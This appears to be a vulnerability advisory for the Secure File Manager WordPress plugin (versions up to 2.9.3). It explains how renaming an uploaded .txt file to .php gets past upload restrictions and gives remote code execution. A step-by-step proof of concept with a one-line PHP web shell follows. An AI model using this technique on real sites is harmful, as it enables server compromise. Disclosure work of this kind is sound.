Secure File Manager <= 2.9.3 – Admin+ RCE

Description

By default an user with administrator privileges can't upload php files for security reason, however, this can be bypassed just by renaming the file after the upload, leading to RCE. Note that this plugin could be accessed either by low-authenticated users if set in the options.

Proof of Concept

1. Go to /wp-admin/admin.php?page=sfm_file_manager
2. In your system, create a file called "shell.txt" (without the double quotes)
and paste this into the file:
<?php system('id'); ?>
3. Click on the fourth icon on the left (the upload button) and upload the shell.txt file
4. Now right-click on the file and select "rename"
5. Change the extension from txt to php (shell.txt --> shell.php)
6. Now browse the file (it should be in your webroot)
7. You should be able to see the "id" command output
# Obviously you can change the file command to any command you like